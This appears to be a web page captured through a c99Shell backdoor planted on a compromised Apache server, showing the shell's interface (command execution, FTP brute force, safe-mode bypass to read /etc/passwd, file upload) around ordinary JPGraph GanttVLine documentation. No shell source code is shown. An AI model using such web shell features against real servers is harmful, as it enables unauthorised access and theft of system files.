!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/docs/ref/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     GanttVLine.html (7.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

CLASS GanttVLine EXTENDS GanttPlotObject
(Defined in: jpgraph_gantt.php : 3426)
 GanttVLine  GanttPlotObject 
 GanttVLine() 
 SetDayOffset() 
 SetTitleMargin() 
 SetCaptionMargin() 
 SetConstrain() 
 SetCSIMAlt() 
 SetCSIMTarget() 
 SetLabelLeftMargin() 
 

Class usage and Overview
This class represents a vertical line on the gantt scale. It can for example be used to illustrate the boundaries between different phases in a project plan. To access the title property just use the 'title' property of the line, for example $line = new GantVLine(.....); $line->title->SetFont(FF_FONT1, FS_BOLD); $ganttgraph->Add($line);

 

See also related classes:
GanttGraph, GanttBar and MileStone

 


Class Methods

 

 

Create a new vertical line in the Gantt graph

ArgumentDefaultDescription
$aDate  Date where the line should be
$aTitle "" Title of line
$aColor "black" Color for line
$aWeight 3 Line weight
$aStyle "dashed" Line style (dotted, slashed etc)

Description
Create a new verticla line according to specification that later on can be added to the gantt graph vis its Add() method. 
 
See also
Image::SetLineStyle

Example

$line = new GanttVLine('2002-11-02','System test starts','darkblue',2,'solid');

$granttgraph->Add($line);


 

 

Specify where in the single day the line sould be drawn.

ArgumentDefaultDescription
$aOff 0.5 Fraction of day (0,1)

Description
Specify where in the single day the line sould be drawn.  

Example

// Draw line in the middle of the day
$line->SetDayOffset(0.5);

 

 

Set distance between end of line and title.

ArgumentDefaultDescription
$aMarg  Margin in pixels

Description
Set distance between end of line and title. 

Example

$line->SetTitleMargin(20);



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--